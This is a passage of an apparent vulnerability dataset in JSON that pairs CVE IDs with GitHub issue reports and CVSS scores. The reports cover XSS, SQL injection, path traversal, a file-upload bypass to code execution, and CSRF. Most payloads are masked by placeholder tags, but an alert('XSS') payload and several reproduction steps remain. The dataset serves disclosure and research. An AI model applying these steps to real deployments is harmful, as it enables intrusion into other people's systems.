  59468. "Repo_new": "cbkhwx/cxuucmsv3",
  59469. "Issue_Created_At": "2020-11-20T09:42:01Z",
  59470. "description": "\u540e\u53f0 xss \u653b\u51fb. FILETAG FILETAG",
  59471. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59472. "severity": "MEDIUM",
  59473. "baseScore": 6.1,
  59474. "impactScore": 2.7,
  59475. "exploitabilityScore": 2.8
  59476. },
  59477. {
  59478. "CVE_ID": "CVE-2020-29250",
  59479. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/3",
  59480. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/3",
  59481. "Repo_new": "cbkhwx/cxuucmsv3",
  59482. "Issue_Created_At": "2020-11-20T14:15:25Z",
  59483. "description": "xss vulnerability exists in FILETAG file. FILETAG",
  59484. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59485. "severity": "MEDIUM",
  59486. "baseScore": 6.1,
  59487. "impactScore": 2.7,
  59488. "exploitabilityScore": 2.8
  59489. },
  59490. {
  59491. "CVE_ID": "CVE-2020-29280",
  59492. "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/13",
  59493. "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/13",
  59494. "Repo_new": "victoralagwu/cmssite",
  59495. "Issue_Created_At": "2020-07-05T09:47:18Z",
  59496. "description": "SQL Injection in FILETAG form. Hi, I've found a UNION SQL Injection into the search parameter of APITAG file. The vulnerable columns are the NUMBERTAG rd NUMBERTAG th NUMBERTAG th and NUMBERTAG th as you can see in the screen below. FILETAG",
  59497. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59498. "severity": "CRITICAL",
  59499. "baseScore": 9.8,
  59500. "impactScore": 5.9,
  59501. "exploitabilityScore": 3.9
  59502. },
  59503. {
  59504. "CVE_ID": "CVE-2020-29315",
  59505. "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/255",
  59506. "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/255",
  59507. "Repo_new": "zoujingli/thinkadmin",
  59508. "Issue_Created_At": "2020-11-26T16:52:43Z",
  59509. "description": "There is a stored xss vulnerability in versions NUMBERTAG An issue was discovered in APITAG version NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point all version : URLTAG APITAG FILETAG NUMBERTAG choose \u7cfb\u7edf\u7ba1\u7406(system management) > APITAG Management) > APITAG users) FILETAG NUMBERTAG input Poc in the nickname and save FILETAG APITAG complete NUMBERTAG FILETAG NUMBERTAG FILETAG Maybe there are more stored XSS",
  59510. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  59511. "severity": "MEDIUM",
  59512. "baseScore": 5.4,
  59513. "impactScore": 2.7,
  59514. "exploitabilityScore": 2.3
  59515. },
  59516. {
  59517. "CVE_ID": "CVE-2020-29394",
  59518. "Issue_Url_old": "https://github.com/GENIVI/dlt-daemon/issues/274",
  59519. "Issue_Url_new": "https://github.com/covesa/dlt-daemon/issues/274",
  59520. "Repo_new": "covesa/dlt-daemon",
  59521. "Issue_Created_At": "2020-11-28T03:15:46Z",
  59522. "description": "stack buffer overflow in dlt_filter_load. Summary An exploitable buffer overflow vulnerability exists in the dlt daemon, A specially crafted Filter file can cause a buffer overflow, resulting in multiple corruptions and potentially code execution. An attacker can provide a specially crafted file to trigger this vulnerability. Details A buffer overflow in the dlt_filter_load function in dlt_common.c in dlt daemon allows arbitrary code execution via an unsafe usage of fscanf, because it does not limit the number of characters to be read in a format argument. Affected NUMBERTAG dlt receive NUMBERTAG dlt sortbytimestamp NUMBERTAG dlt convert APITAG ERRORTAG URLTAG",
  59523. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  59524. "severity": "HIGH",
  59525. "baseScore": 7.8,
  59526. "impactScore": 5.9,
  59527. "exploitabilityScore": 1.8
  59528. },
  59529. {
  59530. "CVE_ID": "CVE-2020-29437",
  59531. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/695",
  59532. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/695",
  59533. "Repo_new": "orangehrm/orangehrm",
  59534. "Issue_Created_At": "2020-11-28T19:16:33Z",
  59535. "description": "security issue. Hi, I would like to report a security issue, can I please get a point of contact? Thanks!",
  59536. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
  59537. "severity": "HIGH",
  59538. "baseScore": 8.1,
  59539. "impactScore": 5.2,
  59540. "exploitabilityScore": 2.8
  59541. },
  59542. {
  59543. "CVE_ID": "CVE-2020-29456",
  59544. "Issue_Url_old": "https://github.com/ciur/papermerge/issues/228",
  59545. "Issue_Url_new": "https://github.com/ciur/papermerge/issues/228",
  59546. "Repo_new": "ciur/papermerge",
  59547. "Issue_Created_At": "2020-11-27T21:37:03Z",
  59548. "description": "Stored Cross Site Scripting (XSS). Description Improper validation of user input leads to stored cross site scripting (XSS) or HTML injection in the papermerge web application. If a user inserts APITAG or HTML code into a folder name, the specified payload will be executed on opening the folder. Expected Specifying potentially malicious client side code should not be executed in the web application by the browser. Actual The browser successfully executes the specified JS or HTML payloads if the newly created folder is opened. Steps to reproduce NUMBERTAG Login to papermerge web application URLTAG NUMBERTAG Create a new folder named \"XSS Folder APITAG alert('XSS'); APITAG \" without the quotes NUMBERTAG Open the newly created folder with XSS payload and experience a APITAG XSS popup saying \"XSS\". Impact This may allow an attacker to steal sensitive session information or CSRF tokens for executing a Cross Site Request Forgery attack. Likelihood Authentication is required to access the papermerge web application. Recommendation Do not trust any user input and validate inputs properly. See URLTAG Info: Tested in the publicly available demo page. URLTAG",
  59549. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59550. "severity": "MEDIUM",
  59551. "baseScore": 6.1,
  59552. "impactScore": 2.7,
  59553. "exploitabilityScore": 2.8
  59554. },
  59555. {
  59556. "CVE_ID": "CVE-2020-29561",
  59557. "Issue_Url_old": "https://github.com/riscv-boom/riscv-boom/issues/504",
  59558. "Issue_Url_new": "https://github.com/riscv-boom/riscv-boom/issues/504",
  59559. "Repo_new": "riscv-boom/riscv-boom",
  59560. "Issue_Created_At": "2020-11-30T11:29:50Z",
  59561. "description": "Misaligned load reserve should not set reservation. APITAG Type of issue : bug report APITAG APITAG Impact : rtl refactoring APITAG Development Phase : proposal Other information APITAG APITAG Misaligned load reserve instruction should not set reservation. However boom set reservation even after misaligned load exception. APITAG makes the bug case binary ( APITAG ). Logs of both boom and rocket are also included. FILETAG",
  59562. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59563. "severity": "MEDIUM",
  59564. "baseScore": 5.5,
  59565. "impactScore": 3.6,
  59566. "exploitabilityScore": 1.8
  59567. },
  59568. {
  59569. "CVE_ID": "CVE-2020-29587",
  59570. "Issue_Url_old": "https://github.com/simplcommerce/SimplCommerce/issues/969",
  59571. "Issue_Url_new": "https://github.com/simplcommerce/simplcommerce/issues/969",
  59572. "Repo_new": "simplcommerce/simplcommerce",
  59573. "Issue_Created_At": "2021-01-13T12:36:40Z",
  59574. "description": "Admin dashboard vulnerable to DOM XSS. Opened this issue because there is not a security advisory or a response from the repo maintainers after sending a report by email. The POC described here used the docker continuous deployment instance ( URLTAG POC The following POC is just an example of many others that are prone to DOM XSS. To better understand and see a more detailed explanation of what is, please see the following link: URLTAG Using the user register page and the input is the Full Name field at the register page ( URLTAG > Payload APITAG alert NUMBERTAG APITAG FILETAG An user with the name _ APITAG alert NUMBERTAG APITAG _ is registered and stored to the database. This payload appears to not be triggered while browsing through the site but when admin needs to remove this user, the payload is executed. Below is shown an example where to trigger our malicious payload at URLTAG FILETAG We can see the registered user and the payload in the full name field. Nothing anormal happens when loading the page. But when trying to remove the user and after clicking the remove button the script of the malicious payload is executed and the alert box appears. This behavior confirms the XSS vulnerability. It requires to click the remove button, but as soon as is clicked, the exploit is executed. Looking to the inspector from the dev tools, we can see the injected script in the Bootbox modal body . FILETAG In the APITAG code, this happens in the following line of code at URLTAG FILETAG When clicked the delete button , the function vm.user(delete) is executed. If we look for the FILETAG file ( FILETAG we can see of the function is doing. FILETAG At line NUMBERTAG the value of APITAG field is added directly to the bootbox modal without proper sanitization making it vulnerable to XSS. Also, at line NUMBERTAG a toast is launched when we confirm deleting the user and again APITAG is added to the toast. The same payload can be triggered twice if we follow this use case. Fixing the vulnerability As the FILETAG maintainer does not fix the XSS vulnerability, to protect the users of APITAG from being attacked is recommended to sanitize input before adding it to any bootbox modal or dialog . The following link explains the approach to validate user data URLTAG The next functions are just suggestions to validate input data. Upon your goals, you can choose the one(s) that best fit to your project: APITAG FILETAG APITAG FILETAG",
  59575. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  59576. "severity": "MEDIUM",
  59577. "baseScore": 5.4,
  59578. "impactScore": 2.7,
  59579. "exploitabilityScore": 2.3
  59580. },
  59581. {
  59582. "CVE_ID": "CVE-2020-29600",
  59583. "Issue_Url_old": "https://github.com/eldy/awstats/issues/90",
  59584. "Issue_Url_new": "https://github.com/eldy/awstats/issues/90",
  59585. "Repo_new": "eldy/awstats",
  59586. "Issue_Created_At": "2018-02-20T12:30:46Z",
  59587. "description": "CVETAG question. See URLTAG To fix this issue I upgraded to the latest release NUMBERTAG dfsg NUMBERTAG ubuntu NUMBERTAG on my ubuntu NUMBERTAG Then I tried to open URLTAG it is still parsing /etc/passwd (even though only trying reading value pairs) and fails: > Warning: Syntax error line NUMBERTAG in file PATHTAG Config line is ignored. > Warning: Syntax error line NUMBERTAG in file PATHTAG Config line is ignored. > Warning: Syntax error line NUMBERTAG in file PATHTAG Config line is ignored. Surely it should not open absolut paths? The problem comes from this code, around line NUMBERTAG if ( APITAG ) { > my APITAG = APITAG APITAG > APITAG try to open an absolute path : APITAG NUMBERTAG if ( f APITAG && open(CONFIG, APITAG { > APITAG = APITAG > APITAG = ''; > if APITAG config: APITAG NUMBERTAG APITAG > } > else { > if APITAG to open config file: APITAG NUMBERTAG In my case, the server has a name, lets say APITAG it also has a DNS alias APITAG However there is no config for that domain in /etc/awstats, so it fails to find a config file it then reads a config file from the parameters and accepts a file that has an absolute path. Sure that should not be allowed? Workaround: comment out the above code. Question: what is the proper way to fix this?",
  59588. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59589. "severity": "CRITICAL",
  59590. "baseScore": 9.8,
  59591. "impactScore": 5.9,
  59592. "exploitabilityScore": 3.9
  59593. },
  59594. {
  59595. "CVE_ID": "CVE-2020-29607",
  59596. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/96",
  59597. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/96",
  59598. "Repo_new": "pluck-cms/pluck",
  59599. "Issue_Created_At": "2020-12-01T18:26:57Z",
  59600. "description": "Remote Code Execution via File Upload Restriction Bypass. Vulnerability Description I have observed that it is possible to upload php file on the system through manage files functionality which leads to compromise the system. As I'm able to upload malicious php file with APITAG extension, and able to execute php code on the server. Observation On line NUMBERTAG of APITAG , I observed that the application uses blacklist extensions to restrict the php malicious file which can be easily bypassed with APITAG extension. Steps to Reproduce NUMBERTAG Login into the application's admin panel NUMBERTAG Navigate to the APITAG NUMBERTAG Now upload the php file with APITAG extension, for e.g. APITAG . FILETAG NUMBERTAG After uploading the php file, navigate to the APITAG . FILETAG Mitigation Rename the uploaded files to some random filenames, remove the file extension and then append your allowed file extension. Whitelisted extension approach should be applied instead of blacklisting. Correct use of APITAG should be applied as shown below for preventing the php file execution in upload directory. APITAG Reference URLTAG FILETAG",
  59601. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  59602. "severity": "HIGH",
  59603. "baseScore": 7.2,
  59604. "impactScore": 5.9,
  59605. "exploitabilityScore": 1.2
  59606. },
  59607. {
  59608. "CVE_ID": "CVE-2020-29651",
  59609. "Issue_Url_old": "https://github.com/pytest-dev/py/issues/256",
  59610. "Issue_Url_new": "https://github.com/pytest-dev/py/issues/256",
  59611. "Repo_new": "pytest-dev/py",
  59612. "Issue_Created_At": "2020-09-03T09:21:46Z",
  59613. "description": "Vulnerable Regular Expression in svnwc.py. Type of Issue Potential Regex Denial of Service APITAG Description The vulnerable regular expression is located in URLTAG The APITAG vulnerabilitiy of the regex is mainly due to the sub pattern (\\d+)\\s (\\S+) and can be exploited with the following string NUMBERTAG I think you can limit the input length or modify this regex.",
  59614. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59615. "severity": "HIGH",
  59616. "baseScore": 7.5,
  59617. "impactScore": 3.6,
  59618. "exploitabilityScore": 3.9
  59619. },
  59620. {
  59621. "CVE_ID": "CVE-2020-29657",
  59622. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4244",
  59623. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4244",
  59624. "Repo_new": "jerryscript-project/jerryscript",
  59625. "Issue_Created_At": "2020-09-29T00:45:00Z",
  59626. "description": "Out of bound read in APITAG APITAG revision APITAG (latest master APITAG Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Execution steps APITAG Output ERRORTAG Expected behavior Please consider that the error line may be larger than the test case line number. The above \"try\" test case has just three lines, but the error happened on line NUMBERTAG a \"catch\" block is needed. ) The jerry_port_read_source (path_str_p, &source_size) called in the APITAG need to malloc more memory to locate an error happened out of the source_size.",
  59627. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  59628. "severity": "CRITICAL",
  59629. "baseScore": 9.1,
  59630. "impactScore": 5.2,
  59631. "exploitabilityScore": 3.9
  59632. },
  59633. {
  59634. "CVE_ID": "CVE-2020-35132",
  59635. "Issue_Url_old": "https://github.com/leenooks/phpLDAPadmin/issues/130",
  59636. "Issue_Url_new": "https://github.com/leenooks/phpldapadmin/issues/130",
  59637. "Repo_new": "leenooks/phpldapadmin",
  59638. "Issue_Created_At": "2020-12-01T15:05:22Z",
  59639. "description": "XSS in FILETAG for NUMBERTAG A user can set a field to an XSS payload, which triggers when the confirmation screen for whether to confirm the change is raised. From FILETAG , say I have an attribute set to the following: FILETAG Then, say I am an admin and would like to change that field back: FILETAG When the field prompts me for a change, the payload is triggered. A user can log into user NUMBERTAG and request a change, then wait for an admin to try deleting the field, which would trigger the payload for that user. FILETAG",
  59640. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  59641. "severity": "MEDIUM",
  59642. "baseScore": 5.4,
  59643. "impactScore": 2.7,
  59644. "exploitabilityScore": 2.3
  59645. },
  59646. {
  59647. "CVE_ID": "CVE-2020-35176",
  59648. "Issue_Url_old": "https://github.com/eldy/awstats/issues/195",
  59649. "Issue_Url_new": "https://github.com/eldy/awstats/issues/195",
  59650. "Repo_new": "eldy/awstats",
  59651. "Issue_Created_At": "2020-12-09T14:40:12Z",
  59652. "description": "path traversal flaw. Hi, It seems NUMBERTAG is not completely fixed in NUMBERTAG that is, even after CVETAG and CVETAG are fixed) Altering slightly the original example: URLTAG to e.g.: URLTAG ERRORTAG URLTAG ERRORTAG FILETAG ERRORTAG it is still parsing /etc/ . I'd expect it to only allow files within PATHTAG .conf. Like NUMBERTAG this requires that PATHTAG does not exist (e.g. in multi hosting environments with no default config).",
  59653. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  59654. "severity": "MEDIUM",
  59655. "baseScore": 5.3,
  59656. "impactScore": 1.4,
  59657. "exploitabilityScore": 3.9
  59658. },
  59659. {
  59660. "CVE_ID": "CVE-2020-35240",
  59661. "Issue_Url_old": "https://github.com/hemantsolo/CVE-Reference/issues/1",
  59662. "Issue_Url_new": "https://github.com/hemantsolo/cve-reference/issues/1",
  59663. "Repo_new": "hemantsolo/cve-reference",
  59664. "Issue_Created_At": "2021-01-08T02:46:00Z",
  59665. "description": "CVETAG : Your example is not reproducible. Your example is not reproducible: >payload in APITAG Content\" APITAG doesn't have APITAG Content\" APITAG go to the URL: URLTAG APITAG the payload in Content: FILETAG on its form does not contain Content field > and the attacker can able to steal the cookie according to the crafted payload. In APITAG user cookies are not accessible from javascript. The httponly flag is enabled by default. URLTAG Or are you talking about admin functions (files admin_ .php)? P.S. URLTAG",
  59666. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  59667. "severity": "MEDIUM",
  59668. "baseScore": 4.8,
  59669. "impactScore": 2.7,
  59670. "exploitabilityScore": 1.7
  59671. },
  59672. {
  59673. "CVE_ID": "CVE-2020-35242",
  59674. "Issue_Url_old": "https://github.com/balloonwj/flamingo/issues/47",
  59675. "Issue_Url_new": "https://github.com/balloonwj/flamingo/issues/47",
  59676. "Repo_new": "balloonwj/flamingo",
  59677. "Issue_Created_At": "2020-11-27T10:59:59Z",
  59678. "description": "There are security risks in the operation of the server on the database. issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. The related business corresponding to the method is the registered account. userid , username , nickname can be controlled, no filtering measures, and directly execute the entire SQL statement. Looking at the code, it is found that the client does not encrypt the transmission data, and the registration information is returned to the server in clear text. Therefore, it can be injected directly in the client registration window. ERRORTAG Poc payload: APITAG or APITAG FILETAG FILETAG FILETAG issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. newteaminfo can be controlled ERRORTAG Poc The client has an input length limit, but the defense of the client is invalid. Hard code the payload into the program. payload: APITAG FILETAG FILETAG issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. groupname can be controlled ERRORTAG Create a group chat function can trigger this function. FILETAG payload\uff1a APITAG The client has an input length limit, but the defense of the client is invalid. Hard code the payload into the program. Find the place where the client sends the json, and hard code the payload in. FILETAG FILETAG issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. ERRORTAG Poc payload: APITAG FILETAG FILETAG",
  59679. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59680. "severity": "CRITICAL",
  59681. "baseScore": 9.8,
  59682. "impactScore": 5.9,
  59683. "exploitabilityScore": 3.9
  59684. },
  59685. {
  59686. "CVE_ID": "CVE-2020-35284",
  59687. "Issue_Url_old": "https://github.com/balloonwj/flamingo/issues/48",
  59688. "Issue_Url_new": "https://github.com/balloonwj/flamingo/issues/48",
  59689. "Repo_new": "balloonwj/flamingo",
  59690. "Issue_Created_At": "2020-12-01T06:20:12Z",
  59691. "description": "Directory traversal vulnerability exists in uploaded and downloaded files. Directory traversal Through code audit, it is found that the file download function in flamingo has a problem with directory traversal. Through this vulnerability, files can be downloaded anywhere on the server through the directory. Test environment CODETAG Vulnerability analysis Flamingo is a C/S mode communication APITAG A sends the file to user B. The server saves the file in A specific folder of the server and waits for User B to receive it. After User B sends the receive request, the server sends the corresponding file to user B. When uploading files, use the result of file md5 encoding as the file name (unfortunately, the encryption process is on the client side). The base directory of the cache file is hard coded in the configuration file, and the corresponding file path is directly spliced \u200b\u200bthrough the base directory and the md5 result. The file has no identification for a specific user, all files exist together, and there is no distinction between different users (that is, the server does not know who the file belongs to, and it can be downloaded as long as the correct file path is provided to the server). Poc From the simple analysis above, it can be seen that this file transfer function has a lot of security issues. Only the most serious problems are demonstrated here. It can be seen from the declaration of the APITAG function in APITAG APITAG Since the download path is directly spliced \u200b\u200bby the base directory and the md5 result, as long as the file name can be controlled, the file name of the form PATHTAG can be used to achieve directory traversal and download any file . Flamingo's problem is that MD5 encryption is done on the client side, and because the communication protocol is open source, it is easy to forge. Find the location where the client sends the download command and tamper with the file name. Add the following statement to the APITAG FILETAG FILETAG FILETAG FILETAG During the test, it is found that when the tampered file path does not exist, the server will first create the file, then write the contents of the sent file, and then download it for the recipient.So using this vulnerability can also achieve arbitrary location write (can be multi level directory traversal). FILETAG Send the file again APITAG file is written on Desktop. FILETAG",
  59692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  59693. "severity": "HIGH",
  59694. "baseScore": 7.5,
  59695. "impactScore": 3.6,
  59696. "exploitabilityScore": 3.9
  59697. },
  59698. {
  59699. "CVE_ID": "CVE-2020-35337",
  59700. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/24",
  59701. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/24",
  59702. "Repo_new": "thinksaas/thinksaas",
  59703. "Issue_Created_At": "2020-12-03T10:11:46Z",
  59704. "description": "Post Auth SQL injection vulnerability in PATHTAG SQL\u6ce8\u5165. Details can be retrived in FILETAG Author of the vuln: Qianxin, Network Security Department, Product Safety Team ( Unc1e ) PATHTAG \u7684title\u53c2\u6570\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e CODETAG Will cause a delay of NUMBERTAG seconds FILETAG",
  59705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59706. "severity": "CRITICAL",
  59707. "baseScore": 9.8,
  59708. "impactScore": 5.9,
  59709. "exploitabilityScore": 3.9
  59710. },
  59711. {
  59712. "CVE_ID": "CVE-2020-35346",
  59713. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/4",
  59714. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/4",
  59715. "Repo_new": "cbkhwx/cxuucmsv3",
  59716. "Issue_Created_At": "2020-12-04T09:19:47Z",
  59717. "description": "A xss vulnerability was discovered in cxuucms NUMBERTAG There is a Persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of APITAG POC ERRORTAG Vulnerability trigger point URLTAG When attacker access system settings all content add. Write poc in statcode form which framed with red line and then save the form. Then the content will be save and the article will be published. FILETAG FILETAG Then view the article webpage named test xss in home page , XSS vulnerability is triggered successfully. FILETAG FILETAG",
  59718. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  59719. "severity": "MEDIUM",
  59720. "baseScore": 4.8,
  59721. "impactScore": 2.7,
  59722. "exploitabilityScore": 1.7
  59723. },
  59724. {
  59725. "CVE_ID": "CVE-2020-35347",
  59726. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/5",
  59727. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/5",
  59728. "Repo_new": "cbkhwx/cxuucmsv3",
  59729. "Issue_Created_At": "2020-12-06T05:10:25Z",
  59730. "description": "There is one CSRF vulnerability that can add the administrator account.. Title : There is one CSRF vulnerability in cxuucms3 that can add the administrator account Description : After the administrator logged in, open the following page, an administrator acount will be created. And attacker an log in to the background using the created account and password. Poc\uff1a APITAG Submuit request CODETAG files : PATHTAG FILETAG PATHTAG FILETAG Suggest \uff1a Verify referer or token before submitting request.",
  59731. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  59732. "severity": "MEDIUM",
  59733. "baseScore": 6.5,
  59734. "impactScore": 3.6,
  59735. "exploitabilityScore": 2.8
  59736. },
  59737. {
  59738. "CVE_ID": "CVE-2020-35380",
  59739. "Issue_Url_old": "https://github.com/tidwall/gjson/issues/192",
  59740. "Issue_Url_new": "https://github.com/tidwall/gjson/issues/192",
  59741. "Repo_new": "tidwall/gjson",
  59742. "Issue_Created_At": "2020-12-07T02:55:43Z",
  59743. "description": "panic: runtime error: slice bounds out of range. payload: func APITAG { APITAG := APITAG APITAG APITAG } goroutine NUMBERTAG running]: PATHTAG NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG b2) PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG aa NUMBERTAG b NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG fa PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG aa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG aa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG da NUMBERTAG c NUMBERTAG a NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ac PATHTAG NUMBERTAG c NUMBERTAG da NUMBERTAG c NUMBERTAG a NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ccb PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG",
  59744. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59745. "severity": "HIGH",
  59746. "baseScore": 7.5,
  59747. "impactScore": 3.6,
  59748. "exploitabilityScore": 3.9
  59749. },
  59750. {
  59751. "CVE_ID": "CVE-2020-35381",
  59752. "Issue_Url_old": "https://github.com/buger/jsonparser/issues/219",
  59753. "Issue_Url_new": "https://github.com/buger/jsonparser/issues/219",
  59754. "Repo_new": "buger/jsonparser",
  59755. "Issue_Created_At": "2020-12-07T02:14:37Z",
  59756. "description": "panic: runtime error: slice bounds out of range. payload: func APITAG { APITAG := APITAG s, _ := APITAG APITAG APITAG } panic: runtime error: slice bounds out of range NUMBERTAG goroutine NUMBERTAG running]: PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG fdb PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7d NUMBERTAG e NUMBERTAG afb NUMBERTAG c NUMBERTAG d7dc0, ...) PATHTAG NUMBERTAG a6 PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7e NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG PATHTAG NUMBERTAG e",
  59757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59758. "severity": "HIGH",
  59759. "baseScore": 7.5,
  59760. "impactScore": 3.6,
  59761. "exploitabilityScore": 3.9
  59762. },
  59763. {
  59764. "CVE_ID": "CVE-2020-35382",
  59765. "Issue_Url_old": "https://github.com/craigrodway/classroombookings/issues/27",
  59766. "Issue_Url_new": "https://github.com/craigrodway/classroombookings/issues/27",
  59767. "Repo_new": "craigrodway/classroombookings",
  59768. "Issue_Created_At": "2020-12-08T13:17:44Z",
  59769. "description": "Classbooking NUMBERTAG has SQL injection. After the administrator logs in, when adding a new user, choose to import the csv file, and there is SQL injection in the csv file username. FILETAG The csv file is as follows: ERRORTAG If mysql has writable permissions\uff0cthis csv file will create a new phpinfo file in the website directory. the POST file is: ERRORTAG FILETAG FILETAG",
  59770. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  59771. "severity": "HIGH",
  59772. "baseScore": 7.2,
  59773. "impactScore": 5.9,
  59774. "exploitabilityScore": 1.2
  59775. },
  59776. {
  59777. "CVE_ID": "CVE-2020-35437",
  59778. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/880",
  59779. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/880",
  59780. "Repo_new": "intelliants/subrion",
  59781. "Issue_Created_At": "2020-12-12T19:10:41Z",
  59782. "description": "PATHTAG stored xss vulnerability. Hello there: I found a stored xss vulnerability in PATHTAG Reproduce through the avatar FILETAG APITAG APITAG",
  59783. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59784. "severity": "MEDIUM",
  59785. "baseScore": 6.1,
  59786. "impactScore": 2.7,
  59787. "exploitabilityScore": 2.8
  59788. },
  59789. {
  59790. "CVE_ID": "CVE-2020-35470",
  59791. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/14087",
  59792. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/14087",
  59793. "Repo_new": "envoyproxy/envoy",
  59794. "Issue_Created_At": "2020-11-18T23:58:28Z",
  59795. "description": "Wrong %DOWNSTREAM_REMOTE_ADDRESS% logged when using proxy protocol with tcp proxy. When using proxy protocol as a listener filter, tcp proxy as the network filter, and access logging, the wrong downstream address is logged. The logged address should be the one from the proxy protocol header on the connection, but the direct peer address is logged instead.",
  59796. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59797. "severity": "HIGH",
  59798. "baseScore": 8.8,
  59799. "impactScore": 5.9,
  59800. "exploitabilityScore": 2.8
  59801. },
  59802. {
  59803. "CVE_ID": "CVE-2020-35471",
  59804. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/14113",
  59805. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/14113",
  59806. "Repo_new": "envoyproxy/envoy",
  59807. "Issue_Created_At": "2020-11-20T05:41:27Z",
